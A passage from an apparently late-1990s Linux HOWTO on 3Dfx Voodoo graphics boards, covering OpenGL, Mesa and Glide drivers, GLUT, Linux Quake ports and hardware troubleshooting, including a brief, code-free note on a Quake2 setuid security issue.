operations in a pipelined hardware accelerated architecture for
triangle and polygon rendering. In a broader sense, OpenGL is a
powerful and generic toolset for hardware assisted computer graphics.



9.2. Where to get additional information on OpenGL?

The official site for OpenGL maintained by the members of the ARB, is
www.opengl.org,

A most recommended site is Mark Kilgard's Gateway to OpenGL Info at
reality.sgi.com/mjk_asd/opengl-links.html: it provides pointers to
book, online manual pages, GLUT, GLE, Mesa, ports to several OS, tons
of demos and tools.

If you are interested in game programming using OpenGL, there is the
OpenGL-GameDev-L@fatcity.com at Listserv@fatcity.com. Be warned, this
is a high traffic list with very technical content, and you will
probably prefer to use procmail to handle the 100 messages per day
coming in. You cut down bandwidth using the SET OpenGL-GameDev-L
DIGEST command. It is also not appropriate if you are looking for
introductions. The archive is handled by the ListServ software, use
the INDEX OpenGL-GameDev-L and GET OpenGL-GameDev-L "filename"
commands to get a preview before subscribing.



9.3. Is Glide an OpenGL implementation?

No, Glide is a proprietary 3Dfx API which several features specific to
the Voodoo Graphics (tm) and Voodoo Rush (tm). A 3Dfx OpenGL is in
preparation (see below). Several Glide features would require
EXTensions to OpenGL, some of which already found in other
implementations (e.g. paletted textures).

The closest thing to a hardware accelerated Linux OpenGL you could
currently get is Brian Paul's Mesa along with David Bucciarelli's Mesa
Voodoo driver (see below).



9.4. Is there an OpenGL driver from 3Dfx?

Both the 3Dfx website and the Quantum3D website announced OpenGL for
Voodoo Graphics (tm) to be available 4Q97. The driver is currently in
Beta, and accessible only to registered deverloper's under written
Beta test agreement.

A linux port has not been announced yet.



9.5. Is there a commercial OpenGL for Linux and 3Dfx?

I am not aware of any third party commercial OpenGL that supports the
Voodoo Graphics (tm). Last time I paid attention, neither MetroX nor
XInside OpenGL did.



9.6. What is Mesa?

Mesa is a free implementation of the OpenGL API, designed and written
by Brian Paul, with contributions from many others. Its performance is
competitive, and while it is not officially certified, it is an almost
fully compliant OpenGL implementation conforming to the ARB
specifications - more complete than some commercial products out,
actually.



9.7. Does Mesa work with 3Dfx?

The latest Mesa MesaVer; release works with Linux Glide 2.4. In fact,
support was included in earlier versions, however, this driver is
still under development, so be prepared for bugs and less than optimal
performance. It is steadily improving, though, and bugs are usually
fixed very fast.

You will need to get the Mesa library archive from the
iris.ssec.wisc.edu FTP site. It is recommended to subscribe to the
mailing list as well, especially when trying to track down bugs,
hardware, or driver limitations. Make sure to get the most recent
distribution. A Mesa-3.0 is in preparation.



9.8. How portable is Mesa with Glide?

It is available for Linux and Win32, and any application based on Mesa
will only have the usual system specific code, which should usually
mean XWindows vs. Windows, or GLX vs. WGL. If you use e.g. GLUT or Qt,
you should get away with any system specifics at all for virtually
most applications. There are only a few issues (like sampling relative
mouse movement) that are not adressed by the available portable GUI
toolkits.

Mesa/Glide is also available for DOS. The port which is 32bit DOS is
maintained by Charlie Wallace and kept up to date with the main Mesa
base. See www.geocities.com/~charlie_x/.for the most current releases.



9.9. Where to get info on Mesa?

The Mesa home page is at www.ssec.wisc.edu/~brianp/Mesa.html. There
is an archive of the Mesa mailing list. at www.iqm.unicamp.br/mesa/.
This list is not specific to 3Dfx and Glide, but if you are interested
in using 3Dfx hardware to accelerate Mesa, it is a good place to
start.


9.10. Where to get information on Mesa Voodoo?

For latest information on the Mesa Voodoo driver maintained by David
Bucciarelli tech.hmw@plus.it see the home page at www-
hmw.caribel.pisa.it/fxmesa/.

9.11. Does Mesa support multitexturing?

Not yet (as of Mesa 2.6), but it is on the list. In Mesa you will
probably have to use the OpenGL EXT_multitexture extension once it is
available. There is no final specification for multitextures in
OpenGL, which is supposed to be part of the upcoming OpenGL 1.2
revision. There might be a Glide driver specific implementation of the
extension in upcoming Mesa releases, but as long as only certain
Quantum3D Obsidian boards come with multiple TMU's, it is not a top
priority. This will surely change once Voodoo 2 (tm) based boards are
in widespread use.



9.12. Does Mesa support single pass trilinear mipmapping?

Multiple TMU's should be used for single pass trilinear mipmapping for
improvement image quality without performance penalty in current Linux
Glide already. Mesa support is not yet done (as of Mesa 2.6), but is
in preparation.



9.13. What is the Mesa "Window Hack"?

The most recent revisions of Mesa contain an experimental feature for
Linux XFree86. Basically, the GLX emulation used by Mesa copies the
contents of the Voodoo Graphics (tm) board's most recently finished
framebuffer content into video memory on each glXSwapBuffers call.
This feature is also available with Mesa for Windows.

This obviously puts some drain on the PCI, doubled by the fact that
this uses X11 MIT SHM, not XFree86 DGA to access the video memory. The
same approach could theoretically be used with e.g. SVGA. The major
benefit is that you could use a Voodoo Graphics (tm) board for
accelerated rendering into a window, and that you don't have to use
the VGA passthrough mode (video output of the VGA board deteoriates in
passing through, which is very visible with high end monitors like
e.g. EIZO F784-T).

Note that this experimental feature is NOT Voodoo Rush (tm) support by
any means. It applies only to the Voodoo Graphics (tm) based boards.
Moreover, you need to use a modified GLUT, as interfacing the window
management system and handling the events appropriately has to be done
by the application, it is not handled in the driver.

Make really sure that you have enabled the following environment
variables:

______________________________________________________________________
export SST_VGA_PASS=1 # to stop video signal switching
export SST_NOSHUTDOWN=1 # to stop video signal switching
export MESA_GLX_FX="window" # to initiate Mesa window mode
______________________________________________________________________


If you manage to forget one of the SST variables, your VGA board will
be shut off, and you will loose the display (but not the actual X). It
is pretty hard to get that back being effectively blind.

Finally, note that the libMesaGL.a (or .so) library can contain
multiple client interfaces. I.e. the GLX, OSMesa, and fxMesa (and
even SVGAMesa) interfaces call all be compiled into the same
libMesaGL.a. The client program can use any of them freely, even
simultaneously if it's careful.



9.14. How about GLUT?

Mark Kilgard's GLUT distribution is a very good place to get sample
applications plus a lot of useful utilities. You will find it at
reality.sgi.com/mjk_asd/glut3/, and you should get it anyway. The
current release is GLUT 3.6, and discussion on a GLUT 3.7 (aka
GameGLUT) has begun. Note that Mark Kilgard has left SGI recently, so
the archive might move some time this year - for the time being it
will be kept at SGI.

There is also a GLUT mailing list, glut@perp.com. Send mail to
majordomo@perp.com, with the (on of the) following in the body of your
email message:

______________________________________________________________________
help
info glut
subscribe glut
end
______________________________________________________________________



As GLUT handles double buffers, windows, events, and other operations
closely tied to hardware and operating system, using GLUT with Voodoo
Graphics (tm) requires support, which is currently in development
within GLX for Mesa. It already works for most cases.



10. FAQ: But Quake?

10.1. What about that 3Dfx GL driver for Quake?

The 3Dfx Quake GL, aka mini-driver, aka miniport, aka Game GL, aka
3Dfx GL alpha, implemented only a Quake-specific subset of OpenGL (see
http://www.cs.unc.edu/~martin/3dfx.html for an inofficial list of
supported code paths). It is not supported, and not updated anymore.
It was a Win32 DLL (opengl32.dll) released by 3Dfx and was available
for Windows only. This DLL is not, and will not be ported to Linux.


10.2. Is there a 3Dfx based glQuake for Linux?

Yes. A Quake linuxquake v0.97 binary has been released based on Mesa
with Glide. The Quake2 q2test binary for Linux and Voodoo Graphics
(tm) has been made available as well. A full Quake2 for Linux was
released in January 1998, with linuxquake2-3.10. Dave "Zoid" Kirsch is
the official maintainer of all Linux ports of Quake, Quakeworld, and
Quake2, including all the recent Mesa based ports. Note that all Linux
ports, including the Mesa based ones, are not officially supported by
id Software.

See ftp.idsoftware.com/idstuff/quake/unix/ for the latest releases.



10.3. Does glQuake run in an XFree86 window?

A revision of Mesa and the Mesa-based Linux glQuake is in preparation.
Mesa already does support this by GLX, but Linux glQuake does not use
GLX.



10.4. Known Linux Quake problems?

Here is an excerpt, as of January 7th, 1998. I omitted most stuff not
specific to &3Dfx; hardware.

o You really should run Quake2 as root when using the SVGALib and/or
GL renders. You don't have to run as root for the X11 refresh, but
the modes on the mouse and sound devices must be read/writable by
whatever user you run it as. Dedicated server requires no special
permissions.

o X11 has some garbage on the screen when 'loading'. This is normal
in 16bit color mode. X11 doesn't work in 24bit (TrueColor). It
would be very slow in any case.

o Some people are experiencing crashes with the GL renderer. Make
sure you install the libMesa that comes with Quake2! Older versions
of libMesa don't work properly.

o If you are experience video 'lag' in the GL renderer (the frame
rate feels like it's lagging behind your mouse movement) type
"gl_finish 1" in the console. This forces update on a per frame
basis.

o When running the GL renderer, make sure you have killed selection
and/or gpm or the mouse won't work as they won't "release" it while
Quake2 is running in GL mode.


10.5. Know Linux Quake security problems?

As Dave Kirsch posted on January 28th, 1998: an exploit for Quake2
under Linux has been published. Quake2 is using shared libraries.
While the READMRE so far does not specifically mention it, note that
Quake2 should not be setuid.

If you want to use the ref_soft and ref_gl renderers, you should run
Quake2 as root. Do not make the binary setuid. You can only run both
those renderers at the console only, so being root is not that much of
an issue.

The X11 render does not need any root permissions (if /dev/dsp is
writable by others for sound). The dedicated server mode does not
need to be root either, obviously.

Problems such as root requirements for games has been sort of a sore
spot in Linux for a number of years now. This is one of the goals that
e.g. GGI is targetting to fix. A ref_ggi might be supported in the
near future.


10.6. Does LinuxQuake use multitexturing?

To my understadnding, glQuake will use a multitexture EXTension if the
OpenGL driver in question offers it. The current Mesa implementation
and the Glide driver for Linux do not yet support this extension, so
for the time being the answer is no. See section on Mesa and
multitexturing for details.
10.7. Where can I get current information on Linux glQuake?

Try some of these sites: the "The Linux Quake Resource" at
linuxquake.telefragged.com, or the "Linux Quake Page" at
www.planetquake.com/threewave/linux/. Alternatively, you could look
for Linux Quake sites in the "SlipgateCentral" database at
www.slipgatecentral.com.



11. FAQ: Troubleshooting?

11.1. Has this hardware been tested?

See hardware requirements list above. I currently do not maintain a
conclusive list of vendors and boards, as no particular board specific
problems have been verified. Currently, only 3Dfx and Quantum3D
provide boards for testing to the developers, so Quantum3D consumer
boards are a safe bet. Every other Voodoo Graphics (tm) based board
should work, too. I have reports regarding the Orchid Righteous 3D,
Guillemot Maxi 3D Gamer, and Diamond Monster 3D.

If you are a board manufacturer who wants to make sure his Voodoo
Graphics (tm), Voodoo Rush (tm) or Voodoo 2 (tm) boards work with
upcoming releases of Linux, Xfree86, Linux Glide and/or Mesa, please
contact me, and I will happily forward your request to the persons
maintaining the drivers in question. If you are interested in support
for Linux Glide on other then the PC platfrom, e.g. DEC Alpha, please
contact the maintainer of Linux Glide Daryll Strauss, at
daryll@harlot.rb.ca.us



11.2. Failed to change I/O privilege?

You need to be root, or setuid your application to run a Glide based
application. For DMA, the driver accesses /dev/mem, which is not
writeable for anybody but root, with good reasons. See the README in
the Glide distribution for Linux.



11.3. Does it work without root privilege?

There are compelling case where the setuid requirement is a problem,
obviously. There are currently solutions in preparation, which require
changes to the library internals itself.



11.4. Displayed images looks awful (single screen)?

If you are using the analog pass through configuration, the common
SVGA or X11 display might look pretty bad. You could try to get a
better connector cable than the one provided with the accelerator
board (the ones delivered with the Diamond Monster 3D are reportedly
worse then the one accompanying the Orchid Righteous 3D), but up to a
degree there will inevitably be signal loss with an additional
transmission added.

If the 640x480 full screen image created by the accelerator board does
look awful, this might indicate a real hardware problem. You will have
to contact the board manufacturer, not 3Dfx for details, as the
quality of the video signal has nothing to do with the accelerator -
the board manufacturer chooses the RAMDAC, output drivers, and other
components responsible.



11.5. The last frame is still there (single or dual screen)?

You terminated your application with Ctrl-C, or it did not exit
normally. The accelerator board will dutifully provide the current
content of the framebuffer as a video signal unless told otherwise.



11.6. Powersave kicks in (dual screen)?

When you application terminates in dual screen setups, the accelerator
board does not provide video output any longer. Thus powersave kicks
each time. To avoid this, use

______________________________________________________________________
setenv SST_DUALSCREEN 1
______________________________________________________________________



11.7. My machine seem to lock (X11, single screen)?

If you are running X when calling a Glide application, you probably
moved the mouse out of the window, and the keyboard inputs do not
reach the application anymore.

If you application is supposed to run concurrently with X11, it is
recommend to expose a full screen window, or use the XGrabPointer and
XGrabServer functions to redirect all inputs to the application while
the X server cannot access the display. Note that grabbing all input
with XGrabPointer and XGrabServer does not qualify as well-behaved
application, and that your program might block the entire system.

If you experience this problem without running X, be sure that there
is no hardware conflict (see below).


11.8. My machine locks (single or dual screen)?

If the system definitely does not respond to any inputs (you are
running two displays and know about the loss of focus), you might
experience a more or less subtle hardware conflict. See installation
troubleshooting section for details.

If there is no obvious address conflict, there might still be other
problems (below). If you are writing your own code the most common
reason for locking is that you didn't snap your vertices. See the
section on snapping in the Glide documentation.


11.9. My machine locks (used with S3 VGA board)?

It is possible you have a problem with memory region overlap specific
to S3. There is some info and a patch to the so-called S3 problem in
the 3Dfx web site, but these apply to Windows only. To my
understanding, the cause of the problem is that some S3 boards (older
revisions of Diamond Stealth S3 968) reserve more memory space than
actually used, thus the Voodoo Graphics (tm) has to be mapped to a
different location. However, this has not been reported as a problem
with Linux, and might be Windows-specific.
11.10. No address conflict, but locks anyway?

If you happen to use a motherboard with non-standard or incomplete PCI
support, you could try to shuffle the boards a bit. I am running an
ASUS TP4XE that has that non-standard modified "Media Slot", i.e. PCI
slot4 with additional connector for ASUS-manufactured SCSI/Sound combo
boards, and I experienced severe problems while running a Diamond
Monster 3D in that slot. The system operates flawlessly since I put
the board in one of the regular slots.



11.11. Mesa runs, but does not access the board?

Be sure that you recompiled all the libraries (including the toolkits
the demo programs use - remember that GLUT does not yet support Voodoo
Graphics (tm)), and that you removed the older libraries, run
ldconfig, and/or set your LD_LIBRARY_PATH properly. Mesa supports
several drivers in parallel (you could use X11 SHM, off screen
rendering, and Mesa Voodoo at the same time), and you might have to
create and switch contexts explicitely (see MakeCurrent function) if
the Voodoo Graphics (tm) isn't chosen by default.



11.12. Resetting dual board SLI?

If a Quantum 3D Obsidian board using in an SLI setup exits abruptly
(i.e., the application crashes, or is aborted by user), the boards are
left in an undefined state. With the dual-board set, you can run a
program called resetsli to reset them. Until you run the resetsli
program, you will not be able to re-initialize the Obsidian board.



11.13. Resetting single board SLI?

The resetsli program mentioned above does not yet work with a single
board Obsidian SLI (e.g. the Obsidian 100-4440SB). You will have to
reboot your system by reset in order to reset the boar